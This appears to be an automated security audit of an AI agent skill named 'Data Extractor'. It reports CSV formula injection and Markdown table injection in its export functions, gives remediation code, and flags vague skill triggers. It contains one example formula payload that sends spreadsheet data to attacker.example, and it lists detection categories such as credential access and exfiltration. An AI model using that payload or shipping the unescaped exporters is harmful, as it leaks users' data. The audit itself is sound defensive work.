Back to skill

Security audit

Data Extractor

Security checks for vulnerabilities and agentic risk

Overview

This is a straightforward data-parsing skill with no hidden execution or persistence, though its CSV and Markdown output examples need care with untrusted data.

Install only if you want a general helper for parsing and cleaning messy data. Treat generated CSV or Markdown as unsafe when the input came from other people or logs, and add spreadsheet and Markdown escaping before sharing or rendering those outputs.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (2)

T09 · Insecure Skill Coding Practices

Warning
Location
SKILL.md:348
Finding

CSV Formula Injection in Exported Data

Content
View full analysis

Vulnerability Details

File Location: SKILL.md, lines 348-365
Vulnerability Type: CSV formula injection
Risk Level: Medium

Vulnerable Code

python
def to_csv(data, headers=None):
    if not data:
        return ""
    
    output = StringIO()
    
    if isinstance(data[0], dict):
        headers = headers or list(data[0].keys())
        writer = csv.DictWriter(output, fieldnames=headers)
        writer.writeheader()
        writer.writerows(data)
    else:
        writer = csv.writer(output)
        if headers:
            writer.writerow(headers)
        writer.writerows(data)
    
    return output.getvalue()

Technical Analysis

The CSV exporter writes headers and cell values directly to the output without neutralizing spreadsheet formula prefixes. If attacker-controlled data begins with characters such as =, +, -, or @, spreadsheet software may interpret the value as a formula rather than plain text.

For example, an attacker could provide a value resembling:

text
=HYPERLINK("https://attacker.example/collect?data="&A1,"Open")

The exact behavior and available formula capabilities depend on the spreadsheet application and its security configuration. The Python csv module correctly escapes CSV syntax, but CSV quoting does not prevent spreadsheet applications from evaluating formulas.

Attack Path

  1. An attacker supplies structured or unstructured input containing a formula-prefixed value.
  2. The Skill parses the input and preserves that value in a data row or header.
  3. to_csv() passes the value directly to csv.DictWriter or csv.writer.
  4. A user downloads or saves the generated CSV.
  5. The user opens the CSV in formula-capable spreadsheet software.
  6. The spreadsheet interprets the attacker-controlled cell as a formula.
  7. Depending on application behavior and security settings, the formula may display deceptive conte ...[truncated 615 chars]
Remediation
View remediation

Remediation Suggestions

  • Apply spreadsheet-aware neutralization to every exported header and cell.
  • Treat values beginning with =, +, -, or @ as potentially dangerous.
  • Prefix dangerous values with a single quote or use another neutralization scheme appropriate for the intended spreadsheet applications.
  • Perform neutralization before passing values to csv.writer or csv.DictWriter.
  • Avoid stripping the neutralization prefix during later processing.
  • Document whether CSV output is intended for machine ingestion or interactive spreadsheet use.
  • Add tests covering malicious values in headers and cells, including values preceded by whitespace, tabs, carriage returns, or newlines.
  • Retain standard CSV escaping in addition to formula neutralization; the two protections address different concerns.

Example hardening approach:

python
def neutralize_spreadsheet_cell(value):
    if not isinstance(value, str):
        return value

    dangerous = value.lstrip().startswith(("=", "+", "-", "@"))
    return "'" + value if dangerous else value

T09 · Insecure Skill Coding Practices

Note
Location
SKILL.md:371
Finding

Unescaped Markdown and Table-Structure Injection

Content
View full analysis

Vulnerability Details

File Location: SKILL.md, lines 371-390
Vulnerability Type: Markdown content injection
Risk Level: Low

Vulnerable Code

python
def to_markdown_table(data):
    if not data:
        return ""
    
    if isinstance(data[0], dict):
        headers = list(data[0].keys())
        rows = [[str(row.get(h, '')) for h in headers] for row in data]
    else:
        headers = [f"Col {i+1}" for i in range(len(data[0]))]
        rows = data
    
    # Build table
    result = []
    result.append('| ' + ' | '.join(headers) + ' |')
    result.append('| ' + ' | '.join(['---'] * len(headers)) + ' |')
    
    for row in rows:
        result.append('| ' + ' | '.join(str(cell) for cell in row) + ' |')
    
    return '\n'.join(result)

Technical Analysis

Headers and cell values are inserted directly into Markdown output. The function does not escape pipe characters, normalize embedded line breaks, or sanitize Markdown and raw HTML constructs.

An attacker-controlled value containing | can alter the intended table structure. Embedded newlines can terminate a row and insert arbitrary subsequent Markdown. Values containing links, images, or raw HTML can produce active or misleading content when processed by a renderer that supports those features.

Whether this becomes active content depends on the downstream Markdown renderer. Renderers that disable raw HTML and dangerous URL schemes reduce the impact, while permissive renderers may permit deceptive links, tracking images, or HTML-based content injection.

Attack Path

  1. An attacker supplies input containing Markdown control characters, newlines, links, images, or HTML.
  2. The Skill parses the input and stores the payload as a header or cell value.
  3. to_markdown_table() interpolates the value directly into the generated table.
  4. The generated Markdown is displayed in a documentation system, web in ...[truncated 856 chars]
Remediation
View remediation

Remediation Suggestions

  • Escape | characters in every header and cell before constructing the table.
  • Replace carriage returns and line feeds with spaces or explicit safe line-break markup.
  • Treat Markdown links, images, and raw HTML according to the trust requirements of the destination.
  • Disable or sanitize raw HTML in the downstream Markdown renderer.
  • Restrict dangerous URL schemes and consider disabling automatic image loading for untrusted content.
  • Use a maintained Markdown-generation or sanitization library when output will be rendered in a web context.
  • Add tests for pipes, multiline values, links, images, raw HTML, and malformed table syntax.
  • Keep contextual output encoding at the final rendering boundary because Markdown escaping alone does not replace HTML sanitization.

Example table-structure hardening:

python
def escape_markdown_table_cell(value):
    text = str(value)
    text = text.replace("\r", " ").replace("\n", " ")
    return text.replace("|", r"\|")
Vulnerability Patterns
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (2)

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
94% confidence
Finding

The skill advertises a broad set of triggers without explicit boundaries, so the agent may invoke it for loosely related requests like parsing, cleaning, or logs even when the user did not intend this specific skill. That ambiguity is dangerous because it can cause over-collection, transformation of sensitive input, or interference with other more appropriate skills in multi-skill environments.

Content

No source excerpt is available for this finding.

Vague Triggers

Medium
Category
Not specified by scanner
Confidence
92% confidence
Finding

The skill advertises a broad set of triggers without explicit boundaries, so the agent may invoke it for loosely related requests like parsing, cleaning, or logs even when the user did not intend this specific skill. That ambiguity is dangerous because it can cause over-collection, transformation of sensitive input, or interference with other more appropriate skills in multi-skill environments.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.